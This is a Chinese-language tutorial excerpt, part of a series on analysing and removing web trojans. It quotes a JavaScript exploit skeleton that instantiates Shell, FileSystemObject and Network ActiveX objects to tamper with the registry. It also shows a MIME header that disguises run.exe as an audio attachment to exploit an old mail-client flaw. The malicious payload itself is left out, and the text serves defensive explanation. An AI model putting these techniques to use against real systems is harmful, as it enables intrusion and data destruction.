網(wǎng)頁木馬深度剖析以及手工清除2

第二節(jié) 網(wǎng)頁病毒、網(wǎng)頁木馬的運(yùn)行機(jī)理分析
    Ⅰ。Javascript.Exception.Exploit
    精華語句：
    Functiondestroy（）{
    try
    {
    //ActiveXinitialization初始化ActiveX，為修改注冊表做準(zhǔn)備
    a1=document.applets[0]；
    //獲取applet運(yùn)行對象，以下語句指向注冊表中有關(guān)IE的表項(xiàng)
    a1.setCLSID（"{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}"）；
    a1.createInstance（）；
    Shl=a1.GetObject（）；
    a1.setCLSID（"{0D43FE01-F093-11CF-8940-00A0C9054228}"）；
    a1.createInstance（）；
    FSO=a1.GetObject（）；
    a1.setCLSID（"{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}"）；
    a1.createInstance（）；
    Net=a1.GetObject（）；
    try
    {
    開始做壞事
    }
    }
    catch（e）
    {}
    }
    catch（e）
    {}
    }
    functiondo（）
    {
    //初始化函數(shù)，并每隔一秒執(zhí)行修改程序
    setTimeout（"destroy（）"，1000）；//設(shè)定運(yùn)行時間1秒
    }
    Do（）//壞事執(zhí)行函數(shù)指令
    全部是JS編寫，沒有什么高深的技術(shù)，但它卻可以把你的計算機(jī)注冊表改的是亂78糟，在你的計算機(jī)里留下各式各樣的垃圾，甚至于連聲招呼都不打就G了你的硬盤。所列出的整段函數(shù)看起來簡單明了，聲明函數(shù)，初始化環(huán)境，取得注冊對象，執(zhí)行讀，寫，刪權(quán)限，定義*作時間（快得叫你連反映都沒有）。
    Ⅱ。錯誤的MIMEMultipurposeInternetMailExtentions，多用途的網(wǎng)際郵件擴(kuò)充協(xié)議頭。
    精華語句：
    Content-Type：multipart/related；
    type="multipart/alternative"；
    boundary="====B===="
    ——====B====
    Content-Type：multipart/alternative；
    boundary="====A===="
    ——====A====
    Content-Type：text/html；
    Content-Transfer-Encoding：quoted-printable
    ——====A====——
    ——====B====
    Content-Type：audio/x-wav；
    name="run.exe"
    Content-Transfer-Encoding：base64
    Content-ID：——以下省略AAAAAN+1個——
    把run.exe的類型定義為audio/x-wav，這下清楚了，這是利用客戶端支持的MIME（多部分網(wǎng)際郵件擴(kuò)展，MultipartInternetMailExtension）類型的漏洞來完成的。